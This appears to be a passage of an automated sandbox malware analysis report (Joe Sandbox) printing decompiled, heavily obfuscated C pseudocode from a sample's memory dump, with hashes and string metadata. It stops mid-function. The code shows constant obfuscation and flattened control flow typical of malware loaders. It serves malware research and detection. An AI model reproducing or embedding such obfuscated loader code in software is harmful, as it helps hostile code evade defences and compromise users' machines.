                          				_v624 = _v624 ^ 0x07eb9ef3;
                          				_v628 = 0x55d92;
                          				_v628 = _v628 >> 0x10;
                          				_v628 = _v628 ^ 0x0529ff2d;
                          				_v628 = _v628 ^ 0x052de72a;
                          				_v664 = 0x989cfa;
                          				_v664 = _v664 * 0x6a;
                          				_v664 = _v664 | 0x8da787ac;
                          				_v664 = _v664 + 0xffffc08b;
                          				_v664 = _v664 ^ 0xbfb72d66;
                          				_v672 = 0x5126c1;
                          				_v672 = _v672 << 0xa;
                          				_v672 = _v672 | 0x6300e881;
                          				_v672 = _v672 * 0x1d;
                          				_v672 = _v672 ^ 0xbca67a4e;
                          				_v636 = 0x3defe6;
                          				_t49 =  &_v636; // 0x3defe6
                          				_v636 =  *_t49 * 9;
                          				_t51 =  &_v636; // 0x3defe6
                          				_v636 =  *_t51 * 0x52;
                          				_v636 = _v636 ^ 0xb28641ab;
                          				_v632 = 0xea2077;
                          				_t56 =  &_v632; // 0xea2077
                          				_v632 =  *_t56 * 0x65;
                          				_v632 = _v632 << 2;
                          				_v632 = _v632 ^ 0x7174f9be;
                          				_v660 = 0x2cce37;
                          				_v660 = _v660 << 0xd;
                          				_v660 = _v660 / _t241;
                          				_v660 = _v660 << 4;
                          				_v660 = _v660 ^ 0x1917ca80;
                          				_v676 = 0x92ca3e;
                          				_t242 = 0x12;
                          				_v676 = _v676 * 0x4b;
                          				_v676 = _v676 << 0xf;
                          				_v676 = _v676 >> 2;
                          				_v676 = _v676 ^ 0x28034127;
                          				_v596 = 0xf7772a;
                          				_v596 = _v596 + 0xffff3df8;
                          				_v596 = _v596 ^ 0x00fc52ab;
                          				_v644 = 0x6698d1;
                          				_v644 = _v644 | 0xc199dbe0;
                          				_v644 = _v644 ^ 0xc1fcc133;
                          				_v592 = 0x7143e7;
                          				_v592 = _v592 >> 2;
                          				_v592 = _v592 ^ 0x0010b3e1;
                          				_v652 = 0x9a4189;
                          				_v652 = _v652 * 0x60;
                          				_v652 = _v652 / _t242;
                          				_v652 = _v652 ^ 0x033cbda1;
                          				_v668 = 0xc5fab;
                          				_v668 = _v668 << 0xb;
                          				_v668 = _v668 >> 9;
                          				_v668 = _v668 + 0x8f67;
                          				_v668 = _v668 ^ 0x0031c4ff;
                          				_v600 = 0x6e8ee8;
                          				_v600 = _v600 ^ 0x0d880c60;
                          				_v600 = _v600 ^ 0x0deba949;
                          				_v616 = 0xb65c97;
                          				_v616 = _v616 + 0xffff6050;
                          				_v616 = _v616 << 6;
                          				_v616 = _v616 ^ 0x2d666d98;
                          				_v640 = 0xcc6d21;
                          				_t243 = 0x1b;
                          				_v640 = _v640 / _t243;
                          				_v640 = _v640 >> 0xe;
                          				_v640 = _v640 ^ 0x000eaea1;
                          				_v680 = 0x87d5f6;
                          				_t244 = 0x76;
                          				_v680 = _v680 * 0x1f;
                          				_v680 = _v680 << 9;
                          				_v680 = _v680 + 0xffff990b;
                          				_v680 = _v680 ^ 0xe5dd4258;
                          				_v608 = 0xe96961;
                          				_v608 = _v608 | 0xb6f9188e;
                          				_v608 = _v608 ^ 0xb6fb8930;
                          				_v656 = 0xc61929;
                          				_v656 = _v656 >> 2;
                          				_v656 = _v656 + 0xcacc;
                          				_v656 = _v656 << 2;
                          				_v656 = _v656 ^ 0x00c38b27;
                          				_v648 = 0x21afdf;
                          				_v648 = _v648 + 0x614;
                          				_v648 = _v648 + 0x692f;
                          				_v648 = _v648 ^ 0x002627a2;
                          				_v620 = 0xc6d0;
                          				_v620 = _v620 + 0xee3f;
                          				_t240 = _v608;
                          				_v620 = _v620 / _t244;
                          				_v620 = _v620 ^ 0x0005d3ba;
                          				do {
                          					while(_t261 != 0x885c2e) {
                          						if(_t261 == 0x1fa5b7d) {
                          							_t244 = _v628;
                          							_t233 = E00D50DB1(_t244,  &_v524, __eflags, _v664, _t244, _v672);
                          							_t268 = _t268 + 0xc;
                          							__eflags = _t233;
                          							if(__eflags != 0) {
                          								_t261 = 0x6c35f0b;
                          								continue;
                          							}
                          						} else {
                          							if(_t261 == 0x4edc737) {
                          								_push(_t244);
                          								_t236 = E00D4DBC1(_t240, _v652,  &_v564, _t244, _v668, _v600, _v616);
                          								_t258 = _v680;
                          								_t244 = _v640;
                          								asm("sbb esi, esi");
                          								_t261 = ( ~_t236 & 0xfe84828b) + 0x203d9a3;
                          								E00D51538(_t244, _t258, _t240);
                          								_t268 = _t268 + 0x1c;
                          								goto L14;
                          							} else {
                          								if(_t261 == 0x6c35f0b) {
                          									_t258 = _v636;
                          									_t244 =  &_v524;
                          									_t238 = E00D545CA(_t244, _t258, _t244, _t244, _v632, _v660, _v676, _v612, _v596, _v644, _t259, _v592, _v624, _v604);
                          									_t240 = _t238;
                          									_t268 = _t268 + 0x30;
                          									__eflags = _t238 - 0xffffffff;
                          									if(__eflags != 0) {
                          										_t261 = 0x4edc737;
                          										continue;
                          									}
                          								} else {
                          									if(_t261 == 0x8f2e6fb) {
                          										_t239 = E00D35477(_t244);
                          										_t266 = _v588 - _v548;
                          										asm("sbb ecx, [esp+0x9c]");
                          										__eflags = _v584 - _t258;
                          										if(__eflags >= 0) {
                          											if(__eflags > 0) {
                          												L19:
                          												_t259 = 1;
                          												__eflags = 1;
                          											} else {
                          												__eflags = _t266 - _t239;
                          												if(_t266 >= _t239) {
                          													goto L19;
                          												}
                          											}
                          										}
                          									} else {
                          										if(_t261 != 0xb8e9ee3) {
                          											goto L14;
                          										} else {
                          											_t261 = 0x1fa5b7d;
                          											continue;
                          										}
                          									}
                          								}
                          							}
                          						}
                          						L20:
                          						return _t259;
                          					}
                          					_t244 = _v608;
                          					E00D4CA1F(_t244, _v656,  &_v588, _v648, _v620);
                          					_t268 = _t268 + 0xc;
                          					_t261 = 0x8f2e6fb;
                          					L14:
                          					__eflags = _t261 - 0x203d9a3;
                          				} while (__eflags != 0);
                          				goto L20;
                          			}

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: /i$?$ai$w $:$Cq$=
                          • API String ID: 0-170593755
                          • Opcode ID: 6a76146150763d185147f5716e969069fdfaef2cf1abbd44bbf6199f519e4632
                          • Instruction ID: 957bc30016e50e9494e1093b2b4d33a2883cf0548eaf90d372c4053d941d9beb
                          • Opcode Fuzzy Hash: 6a76146150763d185147f5716e969069fdfaef2cf1abbd44bbf6199f519e4632
                          • Instruction Fuzzy Hash: D6B10D728083809FC368CF65C58A90BFBE1BBC4758F148A1DF5A9A6220D3B5D949CF53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00D44A66() {
                          				char _v520;
                          				intOrPtr _v524;
                          				intOrPtr _v528;
                          				intOrPtr _v532;
                          				signed int _v536;
                          				signed int _v540;
                          				signed int _v544;
                          				signed int _v548;
                          				signed int _v552;
                          				signed int _v556;
                          				signed int _v560;
                          				signed int _v564;
                          				signed int _v568;
                          				signed int _v572;
                          				signed int _v576;
                          				signed int _v580;
                          				signed int _v584;
                          				signed int _v588;
                          				signed int _v592;
                          				signed int _v596;
                          				signed int _v600;
                          				signed int _v604;
                          				signed int _v608;
                          				signed int _v612;
                          				signed int _v616;
                          				signed int _v620;
                          				signed int _v624;
                          				signed int _v628;
                          				signed int _v632;
                          				signed int _v636;
                          				signed int _v640;
                          				void* _t271;
                          				void* _t272;
                          				intOrPtr _t277;
                          				intOrPtr _t283;
                          				signed int _t285;
                          				intOrPtr _t287;
                          				void* _t289;
                          				intOrPtr _t294;
                          				intOrPtr _t311;
                          				signed int _t317;
                          				signed int _t318;
                          				signed int _t319;
                          				signed int _t320;
                          				signed int _t321;
                          				signed int _t322;
                          				signed int _t323;
                          				intOrPtr _t325;
                          				signed int* _t327;
                          				void* _t330;
                          
                          				_t327 =  &_v640;
                          				_v532 = 0x9eda53;
                          				_v528 = 0x2697e4;
                          				_t289 = 0xd8634eb;
                          				_t325 = 0;
                          				_v524 = 0;
                          				_v580 = 0x257a8f;
                          				_v580 = _v580 + 0xffff0a69;
                          				_t317 = 0x46;
                          				_v580 = _v580 / _t317;
                          				_v580 = _v580 ^ 0x00008592;
                          				_v556 = 0x213626;
                          				_t16 =  &_v556; // 0x213626
                          				_t318 = 0x3f;
                          				_v556 =  *_t16 * 0x37;
                          				_v556 = _v556 ^ 0x0722a203;
                          				_v564 = 0xc854a8;
                          				_v564 = _v564 >> 0xd;
                          				_v564 = _v564 ^ 0x000f067d;
                          				_v568 = 0x3071d1;
                          				_v568 = _v568 + 0xffff48c8;
                          				_v568 = _v568 ^ 0x002621f6;
                          				_v548 = 0x47fca2;
                          				_v548 = _v548 ^ 0x7cca96d7;
                          				_v548 = _v548 ^ 0x7c82555f;
                          				_v624 = 0xc0bc8e;
                          				_v624 = _v624 | 0x773eab6a;
                          				_v624 = _v624 + 0x32c;
                          				_v624 = _v624 + 0xe315;
                          				_v624 = _v624 ^ 0x77fb7a9a;
                          				_v544 = 0x592636;
                          				_v544 = _v544 << 0xb;
                          				_v544 = _v544 ^ 0xc9333252;
                          				_v572 = 0x38b1a;
                          				_v572 = _v572 ^ 0xe2d962db;
                          				_v572 = _v572 ^ 0xe2dfc1be;
                          				_v592 = 0x205e14;
                          				_v592 = _v592 + 0xffffa7ef;
                          				_v592 = _v592 + 0xffff7efd;
                          				_v592 = _v592 ^ 0x001a340d;
                          				_v540 = 0xa56fb;
                          				_v540 = _v540 ^ 0x6fafefe0;
                          				_v540 = _v540 ^ 0x6fae5e5f;
                          				_v616 = 0x18df03;
                          				_v616 = _v616 >> 6;
                          				_v616 = _v616 + 0x4bd4;
                          				_v616 = _v616 * 0xb;
                          				_v616 = _v616 ^ 0x000ee45e;
                          				_v632 = 0xf97e7d;
                          				_v632 = _v632 >> 0xe;
                          				_v632 = _v632 << 1;
                          				_v632 = _v632 >> 8;
                          				_v632 = _v632 ^ 0x0007c205;
                          				_v588 = 0x1ac705;
                          				_v588 = _v588 >> 0xe;
                          				_v588 = _v588 | 0x5b484d5d;
                          				_v588 = _v588 ^ 0x5b49b1bf;
                          				_v608 = 0xcfa712;
                          				_v608 = _v608 << 0xb;
                          				_v608 = _v608 + 0xffff02b3;
                          				_v608 = _v608 / _t318;
                          				_v608 = _v608 ^ 0x01ff3be8;
                          				_v600 = 0x40b8c7;
                          				_v600 = _v600 >> 0xe;
                          				_v600 = _v600 + 0xffff3f18;
                          				_v600 = _v600 ^ 0xffff31b4;
                          				_v560 = 0xb86873;
                          				_v560 = _v560 * 0x79;
                          				_v560 = _v560 ^ 0x572fdc31;
                          				_v596 = 0x3e642a;
                          				_t319 = 0x51;
                          				_v596 = _v596 / _t319;
                          				_t320 = 0x15;
                          				_v596 = _v596 / _t320;
                          				_v596 = _v596 ^ 0x00087e57;
                          				_v636 = 0x2d2a20;
                          				_t132 =  &_v636; // 0x2d2a20
                          				_t321 = 0x64;
                          				_v636 =  *_t132 * 0x60;
                          				_v636 = _v636 + 0xd33d;
                          				_v636 = _v636 << 5;
                          				_v636 = _v636 ^ 0x1e1aa121;
                          				_v640 = 0xb10dcc;
                          				_v640 = _v640 | 0xc382035c;
                          				_v640 = _v640 << 7;
                          				_v640 = _v640 | 0x409aa621;
                          				_v640 = _v640 ^ 0xd99a11e4;
                          				_v584 = 0xf23298;
                          				_v584 = _v584 / _t321;
                          				_v584 = _v584 << 0xa;
                          				_v584 = _v584 ^ 0x09bffa87;
                          				_v620 = 0xffd84f;
                          				_v620 = _v620 + 0x561c;
                          				_v620 = _v620 + 0x86f;
                          				_v620 = _v620 ^ 0xc18b30ac;
                          				_v620 = _v620 ^ 0xc08b73c8;
                          				_v628 = 0x373ddb;
                          				_v628 = _v628 | 0x384c5e9f;
                          				_v628 = _v628 >> 0xc;
                          				_v628 = _v628 + 0xc32f;
                          				_v628 = _v628 ^ 0x000038bb;
                          				_v604 = 0xfde248;
                          				_v604 = _v604 + 0xffff394c;
                          				_t322 = 0x71;
                          				_v604 = _v604 * 0xa;
                          				_v604 = _v604 ^ 0x90dc5ac9;
                          				_v604 = _v604 ^ 0x99310c60;
                          				_v576 = 0xeb2acc;
                          				_v576 = _v576 / _t322;
                          				_v576 = _v576 >> 0xf;
                          				_v576 = _v576 ^ 0x000b47a1;
                          				_v612 = 0xe0e237;
                          				_t199 =  &_v612; // 0xe0e237
                          				_t323 = 0x22;
                          				_v612 =  *_t199 * 0x63;
                          				_v612 = _v612 << 0xf;
                          				_v612 = _v612 + 0xffff9396;
                          				_v612 = _v612 ^ 0xbdacf125;
                          				_v552 = 0xa3e3d4;
                          				_t324 = _v536;
                          				_v552 = _v552 / _t323;
                          				_v552 = _v552 ^ 0x00068221;
                          				goto L1;
                          				do {
                          					while(1) {
                          						L1:
                          						_t330 = _t289 - 0xa9836df;
                          						if(_t330 > 0) {
                          							break;
                          						}
                          						if(_t330 == 0) {
                          							E00D33046(_v616, _v632, _v588, _t324, _v608);
                          							_t327 =  &(_t327[3]);
                          							L12:
                          							_t289 = 0xc26911c;
                          							continue;
                          						}
                          						if(_t289 == 0x7276a71) {
                          							_v536 = _v580;
                          							goto L12;
                          						}
                          						if(_t289 == 0x85778ce) {
                          							E00D407F4();
                          							_t289 = 0x9029ee2;
                          							continue;
                          						}
                          						if(_t289 == 0x9029ee2) {
                          							E00D50DB1(_v584,  &_v520, __eflags, _v620, _t289, _v628);
                          							_t283 = E00D3EFE1(_v576, _v612, _v552,  &_v520);
                          							_t294 =  *0xd56214; // 0x0
                          							 *((intOrPtr*)(_t294 + 4)) = _t283;
                          							L23:
                          							return _t325;
                          						}
                          						if(_t289 != 0x9959e7d) {
                          							goto L20;
                          						}
                          						_t285 = E00D4E8B6(_t289, _v572, _v592, _t289, _v564, _v540);
                          						_t324 = _t285;
                          						_t327 =  &(_t327[4]);
                          						if(_t285 == 0) {
                          							_t289 = 0x7276a71;
                          						} else {
                          							_t287 =  *0xd56214; // 0x0
                          							 *((intOrPtr*)(_t287 + 0x20)) = 1;
                          							_t289 = 0xdb6aac8;
                          						}
                          					}
                          					__eflags = _t289 - 0xc26911c;
                          					if(_t289 == 0xc26911c) {
                          						_t311 =  *0xd56214; // 0x0
                          						_t271 = E00D31A34(_v600, _t311 + 0x34, _t289, _t289, _v560, _v596, _v636, _t289, _v536, _v640);
                          						_t327 =  &(_t327[8]);
                          						_t289 = 0x85778ce;
                          						__eflags = _t271;
                          						_t272 = 1;
                          						_t325 =  ==  ? _t272 : _t325;
                          						goto L20;
                          					}
                          					__eflags = _t289 - 0xd8634eb;
                          					if(_t289 == 0xd8634eb) {
                          						_push(_t289);
                          						_push(_t289);
                          						_t277 = E00D3C5D8(0x444);
                          						_t327 =  &(_t327[3]);
                          						 *0xd56214 = _t277;
                          						_t289 = 0x9959e7d;
                          						goto L1;
                          					}
                          					__eflags = _t289 - 0xdb6aac8;
                          					if(__eflags != 0) {
                          						goto L20;
                          					}
                          					_t289 = 0xa9836df;
                          					_v536 = _v556;
                          					goto L1;
                          					L20:
                          					__eflags = _t289 - 0xdb6d293;
                          				} while (__eflags != 0);
                          				goto L23;
                          			}

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: *-$&6!$*d>$6&Y$7$]MH[
                          • API String ID: 0-1885758756
                          • Opcode ID: 0e74f54e95960168785f34b20a948df8cb20c2955208fb7041fcc8b9f38d67cd
                          • Instruction ID: 04dd4e473ad5106bcf57ef3183af18f2ef802e373392b42c9e9388edb2b2c41c
                          • Opcode Fuzzy Hash: 0e74f54e95960168785f34b20a948df8cb20c2955208fb7041fcc8b9f38d67cd
                          • Instruction Fuzzy Hash: CAD141B15083809FD368CF65C48991BFBE1FBD4758F248A1DF6968A260C3B5C989CF52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 99%
                          			E00D4CCD9(void* __ecx, void* __edx) {
                          				signed int _v4;
                          				intOrPtr _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				signed int _v36;
                          				signed int _v40;
                          				signed int _v44;
                          				signed int _v48;
                          				signed int _v52;
                          				signed int _v56;
                          				signed int _v60;
                          				signed int _v64;
                          				signed int _v68;
                          				signed int _v72;
                          				signed int _v76;
                          				signed int _v80;
                          				signed int _v84;
                          				signed int _v88;
                          				signed int _v92;
                          				signed int _v96;
                          				signed int _v100;
                          				void* _t242;
                          				intOrPtr _t243;
                          				intOrPtr _t244;
                          				void* _t248;
                          				signed int _t250;
                          				signed int _t251;
                          				signed int _t252;
                          				signed int _t253;
                          				signed int _t254;
                          				void* _t282;
                          				void* _t283;
                          				signed int _t285;
                          				signed int* _t287;
                          				signed int* _t288;
                          
                          				_t287 =  &_v100;
                          				_v4 = _v4 & 0x00000000;
                          				_v8 = 0x71e8b0;
                          				_v36 = 0x18cf5b;
                          				_v36 = _v36 + 0x6698;
                          				_v36 = _v36 ^ 0x001a117a;
                          				_v60 = 0xa2890;
                          				_t282 = __edx;
                          				_t248 = __ecx;
                          				_t283 = 0x72ed85;
                          				_t250 = 0x42;
                          				_v60 = _v60 / _t250;
                          				_v60 = _v60 ^ 0xe73bacde;
                          				_v60 = _v60 ^ 0xe73fbe74;
                          				_v40 = 0x9c8291;
                          				_t251 = 0x70;
                          				_v40 = _v40 / _t251;
                          				_v40 = _v40 ^ 0x000cc374;
                          				_v64 = 0xa8df6e;
                          				_t252 = 0x66;
                          				_v64 = _v64 * 0x5a;
                          				_v64 = _v64 | 0x6df616d5;
                          				_v64 = _v64 ^ 0x7ff9e958;
                          				_v88 = 0xc174cb;
                          				_v88 = _v88 ^ 0xe7b64a13;
                          				_v88 = _v88 ^ 0xc84137a7;
                          				_v88 = _v88 << 0xc;
                          				_v88 = _v88 ^ 0x60915aca;
                          				_v32 = 0x752193;
                          				_v32 = _v32 * 0x3f;
                          				_v32 = _v32 ^ 0x1cda7702;
                          				_v92 = 0x141833;
                          				_v92 = _v92 + 0xffffc8f8;
                          				_v92 = _v92 + 0xf362;
                          				_v92 = _v92 << 0x10;
                          				_v92 = _v92 ^ 0xd48431d2;
                          				_v96 = 0xc34044;
                          				_v96 = _v96 << 8;
                          				_v96 = _v96 + 0xffff536d;
                          				_v96 = _v96 + 0x5d23;
                          				_v96 = _v96 ^ 0xc334c852;
                          				_v20 = 0x3a6348;
                          				_v20 = _v20 << 0x10;
                          				_v20 = _v20 ^ 0x6343ca6d;
                          				_v56 = 0x49cd71;
                          				_v56 = _v56 ^ 0x72d9145f;
                          				_v56 = _v56 + 0x4f98;
                          				_v56 = _v56 ^ 0x7290366b;
                          				_v24 = 0x3bf83a;
                          				_v24 = _v24 << 9;
                          				_v24 = _v24 ^ 0x77f6a760;
                          				_v28 = 0x632842;
                          				_v28 = _v28 + 0xffffe69b;
                          				_v28 = _v28 ^ 0x006ee443;
                          				_v48 = 0x4b2ed5;
                          				_v48 = _v48 ^ 0x82c7a85b;
                          				_v48 = _v48 + 0xffff7c4b;
                          				_v48 = _v48 ^ 0x8282f052;
                          				_v52 = 0x4c7b52;
                          				_v52 = _v52 + 0xffffbc1f;
                          				_v52 = _v52 + 0x2e12;
                          				_v52 = _v52 ^ 0x004752b1;
                          				_v16 = 0x3a13fc;
                          				_v16 = _v16 / _t252;
                          				_v16 = _v16 ^ 0x00081e0d;
                          				_v84 = 0x8573c6;
                          				_t253 = 0x4b;
                          				_v84 = _v84 / _t253;
                          				_v84 = _v84 | 0x42242f90;
                          				_v84 = _v84 >> 0xc;
                          				_v84 = _v84 ^ 0x00008b33;
                          				_v100 = 0x3509ce;
                          				_t254 = 0x19;
                          				_v100 = _v100 / _t254;
                          				_t285 = 0x44;
                          				_t255 = 0x6f;
                          				_v100 = _v100 * 0x31;
                          				_v100 = _v100 + 0x6b64;
                          				_v100 = _v100 ^ 0x006714bf;
                          				_v68 = 0x65eeb7;
                          				_v68 = _v68 + 0x24bd;
                          				_v68 = _v68 << 7;
                          				_v68 = _v68 ^ 0x330bb4b3;
                          				_v72 = 0x31388d;
                          				_v72 = _v72 * 0x77;
                          				_v72 = _v72 / _t285;
                          				_v72 = _v72 ^ 0x00560572;
                          				_v76 = 0x10ecc2;
                          				_v76 = _v76 | 0x28471304;
                          				_v76 = _v76 + 0xcdda;
                          				_v76 = _v76 ^ 0x285661a5;
                          				_v44 = 0xf32c83;
                          				_v44 = _v44 / _t255;
                          				_v44 = _v44 / _t285;
                          				_v44 = _v44 ^ 0x000ff213;
                          				_v80 = 0xb9f4a0;
                          				_v80 = _v80 << 0xa;
                          				_v80 = _v80 + 0xd38f;
                          				_v80 = _v80 >> 8;
                          				_v80 = _v80 ^ 0x00ede5ae;
                          				_v12 = 0x138f30;
                          				_v12 = _v12 ^ 0xf49e1969;
                          				_v12 = _v12 ^ 0xf48aec3a;
                          				while(1) {
                          					L1:
                          					_t242 = 0xd8fe181;
                          					do {
                          						L2:
                          						while(_t283 != 0x72ed85) {
                          							if(_t283 == 0xb6c7232) {
                          								_t278 = _v52;
                          								_t255 = _v48;
                          								_t243 = E00D51005(_v48, _v52, _v16, _v84,  *((intOrPtr*)(_t282 + 0x38)));
                          								_t287 =  &(_t287[3]);
                          								 *((intOrPtr*)(_t282 + 0x2c)) = _t243;
                          								__eflags = _t243;
                          								_t242 = 0xd8fe181;
                          								_t283 =  !=  ? 0xd8fe181 : 0xd6f812a;
                          								continue;
                          							}
                          							if(_t283 == 0xc5020c9) {
                          								_push(_v64);
                          								_t244 = E00D53263(_v36, _v60, __eflags, _t248, _v40, _t255);
                          								_t288 =  &(_t287[4]);
                          								 *((intOrPtr*)(_t282 + 0x38)) = _t244;
                          								__eflags = _t244;
                          								if(_t244 != 0) {
                          									E00D5148A(_t244, _t244, _v88, _v32, _v92, _v96);
                          									_t278 = _v56;
                          									_t255 = _v20;
                          									E00D3E2BD(_v56, _v24,  *((intOrPtr*)(_t282 + 0x38)), _v28);
                          									_t287 =  &(_t288[7]);
                          									_t283 = 0xb6c7232;
                          									goto L1;
                          								}
                          							} else {
                          								if(_t283 == 0xd6f812a) {
                          									return E00D3F0E9(_v44,  *((intOrPtr*)(_t282 + 0x38)), _v80, _v12);
                          								}
                          								if(_t283 != _t242) {
                          									goto L13;
                          								} else {
                          									_t244 = E00D40EBC(_v100, _t278, _v68, _v100, _v72, _v76, _v100, _t255, _t282, E00D525F1);
                          									_t287 =  &(_t287[8]);
                          									 *((intOrPtr*)(_t282 + 0x48)) = _t244;
                          									if(_t244 == 0) {
                          										_t283 = 0xd6f812a;
                          										while(1) {
                          											L1:
                          											_t242 = 0xd8fe181;
                          											goto L2;
                          										}
                          									}
                          								}
                          							}
                          							return _t244;
                          						}
                          						_t283 = 0xc5020c9;
                          						L13:
                          						__eflags = _t283 - 0x11d9bb5;
                          					} while (__eflags != 0);
                          					return _t242;
                          				}
                          			}

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #]$$P$Cn$Hc:$R{L$dk
                          • API String ID: 0-1551317889
                          • Opcode ID: dacc6a797b705c45bd5e28bc4a04ddd62197fa9573fee88cc2ddbe10aae48f71
                          • Instruction ID: e5c22da03c2dc6744e677e1804871a03ef8f981fc5b7b2d5fa63f842e3a0115a
                          • Opcode Fuzzy Hash: dacc6a797b705c45bd5e28bc4a04ddd62197fa9573fee88cc2ddbe10aae48f71
                          • Instruction Fuzzy Hash: C7B141B29083419FD358CF25C54941BFBE2FBC4748F108A2DF69996260D3B5CA49CF96
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E00D3F369(void* __ecx) {
                          				void* _v12;
                          				intOrPtr _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				signed int _v36;
                          				signed int _v40;
                          				signed int _v44;
                          				signed int _v48;
                          				signed int _v52;
                          				signed int _v56;
                          				signed int _v60;
                          				signed int _v64;
                          				signed int _v68;
                          				unsigned int _v72;
                          				signed int _v76;
                          				signed int _v80;
                          				signed int _v84;
                          				signed int _v88;
                          				void* _t198;
                          				void* _t199;
                          				void* _t202;
                          				void* _t207;
                          				void* _t210;
                          				void* _t213;
                          				void* _t214;
                          				void* _t216;
                          				signed int _t234;
                          				signed int _t235;
                          				signed int _t236;
                          				signed int _t237;
                          				signed int _t238;
                          				signed int _t239;
                          				void* _t241;
                          				signed int* _t243;
                          				void* _t246;
                          
                          				_t243 =  &_v88;
                          				_v16 = 0x3949c2;
                          				asm("stosd");
                          				_t214 = __ecx;
                          				_t241 = 0;
                          				_t216 = 0x68b8c0f;
                          				asm("stosd");
                          				asm("stosd");
                          				_v76 = 0x201aab;
                          				_t234 = 0x76;
                          				_v76 = _v76 / _t234;
                          				_v76 = _v76 + 0xe408;
                          				_t235 = 0xc;
                          				_v76 = _v76 * 0x38;
                          				_v76 = _v76 ^ 0x004fdd99;
                          				_v44 = 0xd502f1;
                          				_v44 = _v44 | 0x910f8184;
                          				_v44 = _v44 / _t235;
                          				_v44 = _v44 ^ 0x0c2ba140;
                          				_v48 = 0xe41bd4;
                          				_v48 = _v48 ^ 0x89eac382;
                          				_t236 = 0x67;
                          				_v48 = _v48 / _t236;
                          				_v48 = _v48 ^ 0x015e526e;
                          				_v24 = 0xf49d06;
                          				_v24 = _v24 | 0x486b4754;
                          				_v24 = _v24 ^ 0x48f37dd9;
                          				_v88 = 0xd25a8e;
                          				_v88 = _v88 ^ 0x0de03e2c;
                          				_v88 = _v88 >> 8;
                          				_t237 = 0x57;
                          				_v88 = _v88 / _t237;
                          				_v88 = _v88 ^ 0x00057327;
                          				_v32 = 0x480afd;
                          				_v32 = _v32 ^ 0x00453f61;
                          				_v60 = 0x165baf;
                          				_v60 = _v60 << 0xa;
                          				_v60 = _v60 ^ 0xd8cf9c31;
                          				_v60 = _v60 ^ 0x81a5172b;
                          				_v84 = 0x2fcd58;
                          				_v84 = _v84 + 0x335f;
                          				_v84 = _v84 + 0xffff6358;
                          				_v84 = _v84 << 9;
                          				_v84 = _v84 ^ 0x5ec42bb0;
                          				_v40 = 0xbc2783;
                          				_v40 = _v40 + 0xffff2ae1;
                          				_t238 = 0xa;
                          				_v40 = _v40 * 0x5e;
                          				_v40 = _v40 ^ 0x44c8bdaa;
                          				_v72 = 0xc9404f;
                          				_v72 = _v72 | 0xfaaf7fa5;
                          				_v72 = _v72 / _t238;
                          				_v72 = _v72 >> 0xc;
                          				_v72 = _v72 ^ 0x000be8dc;
                          				_v56 = 0xcb8585;
                          				_v56 = _v56 >> 6;
                          				_v56 = _v56 ^ 0xa4d175a3;
                          				_v56 = _v56 ^ 0xa4d4e9a5;
                          				_v28 = 0xfbd7ad;
                          				_v28 = _v28 + 0xffffc7a7;
                          				_v28 = _v28 ^ 0x00f429b0;
                          				_v80 = 0x6cf7c4;
                          				_v80 = _v80 << 0xb;
                          				_v80 = _v80 ^ 0xc9851cf7;
                          				_v80 = _v80 + 0xe116;
                          				_v80 = _v80 ^ 0xae3f2149;
                          				_v52 = 0xd995b1;
                          				_v52 = _v52 + 0x112b;
                          				_v52 = _v52 + 0xffff70e0;
                          				_v52 = _v52 ^ 0x00d4086e;
                          				_v64 = 0x3e6f55;
                          				_v64 = _v64 ^ 0x64233eb3;
                          				_v64 = _v64 + 0xfffff8c9;
                          				_v64 = _v64 + 0xffffb5e5;
                          				_v64 = _v64 ^ 0x64179829;
                          				_v68 = 0x30eb6c;
                          				_t239 = 0x37;
                          				_v68 = _v68 / _t239;
                          				_v68 = _v68 + 0xffffeee1;
                          				_v68 = _v68 >> 0xa;
                          				_v68 = _v68 ^ 0x000816d3;
                          				_v20 = 0x71a516;
                          				_v20 = _v20 | 0x2f4429e5;
                          				_v20 = _v20 ^ 0x2f784372;
                          				_v36 = 0xda1832;
                          				_v36 = _v36 * 0x4c;
                          				_v36 = _v36 + 0xffff5a89;
                          				_v36 = _v36 ^ 0x40b976b8;
                          				goto L1;
                          				do {
                          					while(1) {
                          						L1:
                          						_t246 = _t216 - 0x68b8c0f;
                          						if(_t246 > 0) {
                          							break;
                          						}
                          						if(_t246 == 0) {
                          							_t216 = 0xe6264d6;
                          							continue;
                          						} else {
                          							if(_t216 == 0x8a1c17) {
                          								_push(_t216);
                          								_t202 = E00D407F0();
                          								_t243 =  &(_t243[1]);
                          								_t216 = 0xf218af8;
                          								_t241 = _t241 + _t202;
                          								continue;
                          							} else {
                          								if(_t216 == 0x50fe579) {
                          									_t241 = _t241 + E00D4BE8C(_t214 + 0x2c, _v64, _v68, _v20, _v36);
                          								} else {
                          									if(_t216 == 0x530d654) {
                          										_push(_t216);
